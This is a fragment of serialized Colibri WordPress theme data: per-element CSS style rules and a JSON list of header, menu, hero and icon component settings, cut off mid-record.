stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:970;a:3:{s:7:\"desktop\";s:61:\"#colibri .style-970 {\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:971;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:972;a:3:{s:7:\"desktop\";s:159:\".style-972 > .h-y-container > *:not(:last-child) {\n  margin-bottom: 10px;\n}\n#colibri .style-972 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:973;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-973-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-973-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-973-caption {\n  margin-top: 10px;\n}\n#colibri .style-973-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:974;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-974 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:975;a:3:{s:7:\"desktop\";s:201:\"#colibri .style-975 {\n  font-style: italic;\n}\n#colibri .style-975 p {\n  font-style: italic;\n}\n#colibri .style-975 ul {\n  list-style-type: disc;\n}\n#colibri .style-975 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:976;a:3:{s:7:\"desktop\";s:107:\"#colibri .style-976 ul {\n  list-style-type: disc;\n}\n#colibri .style-976 ol {\n  list-style-type: decimal;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:977;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-977 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-977 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-977 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-977 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:978;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-978-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-978-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-978-caption {\n  margin-top: 10px;\n}\n#colibri .style-978-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:979;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-979 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-979 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-979 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-979 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:980;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-980-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-980-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-980-caption {\n  margin-top: 10px;\n}\n#colibri .style-980-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:981;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-981 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-981 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-981 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-981 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:982;a:3:{s:7:\"desktop\";s:1393:\"#colibri .style-982-image {\n  opacity: 1;\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-982-overlay {\n  border-top-width: 0px;\n  border-top-style: none;\n  border-top-left-radius: 300px;\n  border-top-right-radius: 300px;\n  border-right-width: 0px;\n  border-right-style: none;\n  border-bottom-width: 0px;\n  border-bottom-style: none;\n  border-bottom-left-radius: 300px;\n  border-bottom-right-radius: 300px;\n  border-left-width: 0px;\n  border-left-style: none;\n}\n#colibri .style-982-caption {\n  margin-top: 10px;\n}\n#colibri .style-982-frameImage {\n  z-index: -1;\n  transform: translateX(10%) translateY(10%);\n  transform-origin: center center 0px;\n  background-color: rgb(0,0,0);\n  height: 100%;\n  width: 100% ;\n  border-top-width: 10px;\n  border-top-color: rgb(0,0,0);\n  border-top-style: none;\n  border-right-width: 10px;\n  border-right-color: rgb(0,0,0);\n  border-right-style: none;\n  border-bottom-width: 10px;\n  border-bottom-color: rgb(0,0,0);\n  border-bottom-style: none;\n  border-left-width: 10px;\n  border-left-color: rgb(0,0,0);\n  border-left-style: none;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:983;a:3:{s:7:\"desktop\";s:380:\"#colibri .style-983 .icon-container {\n  fill: rgb(163, 206, 250);\n  width: 20px ;\n  height: 20px;\n}\n#colibri .style-983 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-983 .icon-container:hover {\n  fill: #303e7a;\n}\n#colibri .style-983 .social-icon-container {\n  margin-right: 5px;\n  padding-top: 5px;\n  padding-right: 5px;\n  padding-bottom: 5px;\n  padding-left: 5px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:984;a:3:{s:7:\"desktop\";s:0:\"\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:985;a:3:{s:7:\"desktop\";s:83:\"#colibri .style-985 {\n  text-align: center;\n  height: auto;\n  min-height: unset;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}i:986;a:3:{s:7:\"desktop\";s:148:\"#colibri .style-986 .text-wrapper-fancy svg path {\n  stroke: #000000;\n  stroke-linejoin: initial;\n  stroke-linecap: initial;\n  stroke-width: 8px;\n}\n\";s:6:\"tablet\";s:0:\"\";s:6:\"mobile\";s:0:\"\";}}s:5:\"rules\";s:233464:\"[{\"id\":1,\"type\":\"hop-header\",\"v\":\"1.1\",\"nodes\":[\"7-h1\",\"22-h1\"]},{\"id\":2,\"style\":{\"ancestor\":{\"sticky\":{\"background\":{\"color\":\"#ffffff\"},\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"10\"},\"bottom\":{\"path\":\"value\",\"value\":\"10\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"boxShadow\":{\"enabled\":true,\"layers\":[{\"spread\":\"0\",\"blur\":\"4\"}]}}},\"padding\":{\"top\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"bottom\":{\"path\":\"value\",\"value\":20,\"unit\":\"px\"},\"right\":{\"value\":\"15\",\"unit\":\"px\"},\"left\":{\"value\":\"15\",\"unit\":\"px\"}},\"media\":{\"mobile\":{\"padding\":{\"top\":{\"path\":\"value\",\"value\":\"0\"},\"bottom\":{\"path\":\"value\",\"value\":\"0\"}}}},\"background\":{\"color\":\"transparent\"}},\"type\":\"hop-navigation\",\"props\":{\"overlap\":true,\"sticky\":true,\"stickyStartAt\":\"immediately\",\"showTopBar\":false,\"width\":\"boxed\",\"layoutType\":\"logo-spacing-menu\"},\"v\":\"1.1\",\"nodes\":[\"7-h2\",\"22-h2\"]},{\"id\":3,\"props\":{\"containerWidth\":\"boxed\",\"layout\":{\"equalWidth\":false,\"itemsPerRow\":1,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"media\":{\"mobile\":{\"layout\":{\"horizontalGap\":2,\"verticalGap\":2}}}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h3\",\"10-h3\",\"22-h3\"]},{\"id\":4,\"props\":{\"verticalAlign\":\"center\",\"layout\":{\"horizontalInnerGap\":0,\"verticalInnerGap\":0}},\"type\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"media\":{\"mobile\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}}}}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h4\",\"22-h4\"]},{\"id\":5,\"type\":\"hop-logo\",\"props\":{\"horizontalTextAlign\":\"left\",\"media\":{\"mobile\":{\"horizontalTextAlign\":\"left\"}},\"layoutType\":\"text\"},\"v\":\"1.1\",\"nodes\":[\"7-h5\",\"22-h5\"],\"style\":{\"descendants\":{\"logo-text\":{\"typography\":{\"color\":\"${theme.colors.4}\"}},\"text\":{\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"24\"}}}}}},{\"id\":6,\"style\":{\"padding\":{\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}}},\"props\":{\"verticalAlign\":\"center\",\"hide\":{\"mobile\":true}},\"type\":\"hop-column\",\"nodeId\":\"7-h66\",\"v\":\"1.1\",\"nodes\":[\"7-h6\",\"22-h6\"]},{\"id\":7,\"type\":\"hop-spacer\",\"nodeId\":\"7-h78\",\"v\":\"1.1\",\"nodes\":[\"7-h7\",\"10-h7\",\"22-h7\"]},{\"id\":8,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"textAlign\":\"center\",\"media\":{\"mobile\":{\"textAlign\":\"center\"}},\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h8\",\"22-h8\"]},{\"id\":9,\"type\":\"hop-horizontal-menu\",\"style\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}}},\"typography\":{\"color\":\"${theme.colors.5|variant2}\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0|variant0}\"}},\"innerMenu\":{\"justifyContent\":\"flex-end\"}},\"ancestor\":{\"sticky\":{\"descendants\":{\"link\":{\"states\":{\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0}\"}},\"hover\":{\"typography\":{\"color\":\"${theme.colors.0}\"}}},\"typography\":{\"color\":\"${theme.colors.0|variant3}\"}},\"hover-effect-border\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}}}},\"props\":{\"hoverEffect\":{\"type\":\"bordered-active-item bordered-active-item--bottom\",\"activeGroup\":\"border\",\"group\":{\"border\":{\"transition\":\"effect-borders-grow grow-from-center\"}},\"enabled\":true},\"sticky\":true,\"showOffscreenMenuOn\":\"has-offcanvas-tablet\"},\"v\":\"1.1\",\"nodes\":[\"7-h9\",\"22-h9\"]},{\"id\":10,\"type\":\"hop-mobile-menu\",\"nodeId\":\"11-h33\",\"v\":\"1.1\",\"nodes\":[\"7-h10\",\"10-h10\",\"22-h10\"]},{\"id\":11,\"type\":\"hop-offscreen-panel\",\"nodeId\":\"11-h34\",\"v\":\"1.1\",\"nodes\":[\"7-h11\",\"10-h11\",\"22-h11\"]},{\"id\":12,\"type\":\"hop-row\",\"nodeId\":\"11-h36\",\"v\":\"1.1\",\"nodes\":[\"7-h13\",\"10-h13\",\"22-h13\"]},{\"id\":13,\"type\":\"hop-column\",\"nodeId\":\"11-h37\",\"v\":\"1.1\",\"nodes\":[\"7-h14\",\"10-h14\",\"22-h14\"]},{\"id\":14,\"type\":\"hop-logo\",\"nodeId\":\"11-h38\",\"v\":\"1.1\",\"nodes\":[\"7-h15\",\"10-h15\",\"22-h15\"],\"props\":{\"layoutType\":\"text\"}},{\"id\":15,\"type\":\"hop-row\",\"nodeId\":\"11-h39\",\"v\":\"1.1\",\"nodes\":[\"7-h16\",\"10-h16\",\"22-h16\"]},{\"id\":16,\"type\":\"hop-column\",\"nodeId\":\"11-h40\",\"v\":\"1.1\",\"nodes\":[\"7-h17\",\"10-h17\",\"22-h17\"]},{\"id\":17,\"style\":{\"descendants\":{\"link\":{\"typography\":{\"color\":\"white\"}},\"submenu-item-link\":{\"typography\":{\"color\":\"white\"}},\"iconOption\":{\"typography\":{\"color\":\"white\"}},\"subMenuIcon\":{\"typography\":{\"color\":\"white\"}}}},\"props\":{\"layout\":\"accordion\"},\"type\":\"hop-accordion-menu\",\"nodeId\":\"11-h35\",\"v\":\"1.1\",\"nodes\":[\"7-h12\",\"10-h12\",\"22-h12\"]},{\"id\":18,\"type\":\"hop-top-bar\",\"props\":{\"width\":\"boxed\"},\"v\":\"1.1\",\"nodes\":[\"7-h19\",\"10-h19\",\"22-h18\"]},{\"id\":19,\"style\":{\"background\":{\"color\":\"black\"},\"padding\":{\"top\":{\"value\":\"5\",\"unit\":\"px\"},\"right\":{\"unit\":\"px\",\"value\":\"15\"},\"bottom\":{\"value\":\"5\",\"unit\":\"px\"},\"left\":{\"unit\":\"px\",\"value\":\"15\"}}},\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":0,\"verticalInnerGap\":0,\"custom\":{\"horizontalGap\":{\"unit\":\"px\"},\"verticalGap\":{\"unit\":\"px\"},\"horizontalInnerGap\":{\"unit\":\"px\"},\"verticalInnerGap\":{\"unit\":\"px\"}}},\"fullBackground\":true,\"hide\":{\"mobile\":true}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h20\",\"10-h20\",\"22-h19\"]},{\"id\":20,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}},\"textAlign\":\"left\"},\"v\":\"1.1\",\"nodes\":[\"7-h21\",\"10-h21\",\"22-h20\"]},{\"id\":21,\"type\":\"hop-icon-list\",\"style\":{\"descendants\":{\"li\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"divider\":{\"border\":{\"left\":{\"width\":{\"value\":1,\"unit\":\"px\"}},\"bottom\":{\"width\":{\"value\":0,\"unit\":\"px\"}}},\"height\":{\"value\":100,\"unit\":\"%\"}},\"containerDivider\":{\"height\":{\"value\":100,\"unit\":\"%\"},\"width\":{\"value\":1,\"unit\":\"px\"},\"padding\":{\"left\":{\"value\":10,\"unit\":\"px\"},\"top\":{\"value\":0,\"unit\":\"px\"},\"right\":{\"value\":10,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}}},\"icon\":{\"width\":{\"path\":\"value\",\"value\":\"18\"},\"fill\":\"${theme.colors.4}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\",\"background\":{\"color\":\"rgba(3, 169, 244, 0)\"}}},\"height\":{\"path\":\"value\",\"value\":\"18\"},\"border\":{\"top\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"right\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"bottom\":{\"style\":\"none\",\"radius\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"}},\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"},\"left\":{\"style\":\"none\",\"width\":{\"value\":\"2\",\"unit\":\"px\"},\"color\":\"${theme.colors.0}\"}},\"padding\":{\"top\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"},\"left\":{\"value\":\"0\",\"unit\":\"px\",\"path\":\"value\"}}},\"text\":{\"margin\":{\"left\":{\"path\":\"value\",\"value\":\"5\"}},\"color\":\"${theme.colors.4}\",\"typography\":{\"size\":{\"unit\":\"px\",\"value\":\"14\"}}},\"list-item\":{\"padding\":{\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":0,\"unit\":\"px\"}},\"horizontalAlign\":\"start\"}}},\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #1\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.15907223444395013},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #2\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.34341111083051734},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #3\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.0941660601972718},{\"title\":\"List\",\"link\":{\"newWindow\":false,\"noFollow\":false},\"text\":\"List item #4\",\"allIcons\":false,\"icon\":\"font-awesome\\/check\",\"type\":\"svg\",\"id\":0.5295691579821964}],\"iconAndTextAlign\":\"center\",\"listLayout\":\"horizontal\"},\"v\":\"1.1\",\"nodes\":[\"7-h22\",\"10-h22\",\"22-h21\"]},{\"id\":22,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"padding\":{\"left\":{\"unit\":\"px\"},\"right\":{\"unit\":\"px\"},\"top\":{\"unit\":\"px\"},\"bottom\":{\"unit\":\"px\"}}},\"v\":\"1.1\",\"nodes\":[\"7-h23\",\"10-h23\",\"22-h22\"]},{\"id\":23,\"type\":\"hop-social-icons\",\"style\":{\"descendants\":{\"icon-content\":{\"fill\":\"${theme.colors.4|variant1}\",\"states\":{\"hover\":{\"fill\":\"${theme.colors.4}\"}},\"width\":{\"value\":\"20\"},\"height\":{\"value\":\"20\"}},\"icon\":{\"margin\":{\"right\":{\"value\":\"0\"}},\"padding\":{\"top\":{\"value\":\"5\"},\"left\":{\"value\":\"5\"},\"bottom\":{\"value\":\"5\"},\"right\":{\"value\":\"5\"}}}}},\"props\":{\"horizontalAlign\":\"end\",\"media\":{\"mobile\":{\"horizontalAlign\":\"center\"}},\"hide\":{\"mobile\":false}},\"v\":\"1.1\",\"nodes\":[\"7-h24\",\"10-h24\",\"22-h23\"]},{\"id\":24,\"style\":{\"typography\":{\"holders\":{\"h1\":{\"color\":\"${theme.colors.4}\"},\"h2\":{\"color\":\"${theme.colors.4}\"},\"h3\":{\"color\":\"${theme.colors.4}\"},\"h4\":{\"color\":\"${theme.colors.4}\"},\"h5\":{\"color\":\"${theme.colors.4}\"},\"h6\":{\"color\":\"${theme.colors.4}\"},\"p\":{\"color\":\"${theme.colors.4}\"}}},\"background\":{\"type\":\"image\",\"overlay\":{\"enabled\":true,\"type\":\"color\",\"gradient\":{\"angle\":\"-20\",\"steps\":[{\"color\":\"rgba(183,33,255, 0.4)\",\"position\":\"0\"},{\"color\":\"rgba(33,212,253, 0.4)\",\"position\":\"100\"}],\"name\":\"october_silence\"},\"shape\":{\"value\":\"none\",\"isTile\":false,\"img\":\"data:image\\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAALEgAACxIB0t1+\\/AAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAAAANSURBVAiZY\\/j\\/\\/z8DAAj8Av6Fzas0AAAAAElFTkSuQmCC\"},\"color\":{\"opacity\":0.4,\"value\":\"#000000\",\"opacity_\":40},\"light\":false},\"image\":[{\"source\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/header-scaled.jpg\",\"gradient\":{\"name\":\"october_silence\",\"angle\":0,\"steps\":[{\"position\":\"0\",\"color\":\"#b721ff\"},{\"position\":\"100\",\"color\":\"#21d4fd\"}]}},\"attachment\":\"scroll\",\"position\":\"center center\",\"repeat\":\"no-repeat\",\"size\":\"cover\",\"useParallax\":false}],\"color\":\"#03a9f4\",\"slideshow\":{\"duration\":{\"value\":1500},\"speed\":{\"value\":500},\"slides\":[{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/beach-landscape-sea-water-nature-sand-1061655-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/landscape-tree-water-nature-grass-outdoor-1327743-pxhere.com.jpg\"},{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/themes\\/colibri-wp\\/resources\\/images\\/leaf-nature-water-green-freshness-dew-1440543-pxhere.com.jpg\"}]},\"video\":{\"videoType\":\"external\",\"externalUrl\":\"https:\\/\\/www.youtube.com\\/watch?v=coYirc_qoSA\",\"internalUrl\":false,\"poster\":{\"url\":\"https:\\/\\/static.colibriwp.com\\/assets\\/sources\\/colibri-demo-video-cover.jpg\"}}},\"padding\":{\"top\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"},\"bottom\":{\"unit\":\"px\",\"value\":\"200\",\"path\":\"value\"}},\"separatorBottom\":{\"enabled\":false,\"type\":\"mountains\",\"color\":\"#FFF\",\"height\":{\"value\":100},\"negative\":false}},\"props\":{\"heroSection\":{\"layout\":\"textOnly\",\"mediaType\":\"hop-image\"},\"attrs\":{\"name\":\"hero\",\"id\":\"hero\"},\"layoutType\":\"textWithMediaOnRight\"},\"type\":\"hop-hero\",\"v\":\"1.1\",\"nodes\":[\"7-h25\",\"22-h24\"]},{\"id\":25,\"props\":{\"layout\":{\"equalWidth\":false,\"horizontalGap\":0,\"verticalGap\":0,\"horizontalInnerGap\":3,\"verticalInnerGap\":3}},\"type\":\"hop-row\",\"v\":\"1.1\",\"nodes\":[\"7-h26\",\"22-h25\"]},{\"id\":26,\"props\":{\"verticalAlign\":\"center\"},\"type\":\"hop-column\",\"style\":{\"border\":{\"top\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"right\":{\"style\":\"solid\"},\"bottom\":{\"style\":\"solid\",\"radius\":{\"left\":{\"value\":\"\",\"unit\":\"px\"},\"right\":{\"value\":\"\",\"unit\":\"px\"}}},\"left\":{\"style\":\"solid\"}},\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":80,\"unit\":\"%\"}}}}},\"v\":\"1.1\",\"nodes\":[\"7-h27\",\"22-h26\"]},{\"id\":27,\"props\":{\"headerType\":\"1\"},\"type\":\"hop-heading\",\"v\":\"1.1\",\"nodes\":[\"7-h28\",\"22-h27\"],\"style\":{\"typography\":{\"weight\":\"600\"},\"textAlign\":\"center\"}},{\"id\":28,\"props\":{\"type\":\"lead\"},\"type\":\"hop-text\",\"v\":\"1.1\",\"nodes\":[\"7-h29\",\"22-h28\"]},{\"id\":29,\"type\":\"hop-button-group\",\"v\":\"1.1\",\"nodes\":[\"7-h30\",\"22-h29\"]},{\"id\":30,\"style\":{\"background\":{\"color\":\"${theme.colors.0}\",\"type\":\"none\",\"image\":[{\"source\":{\"type\":\"gradient\",\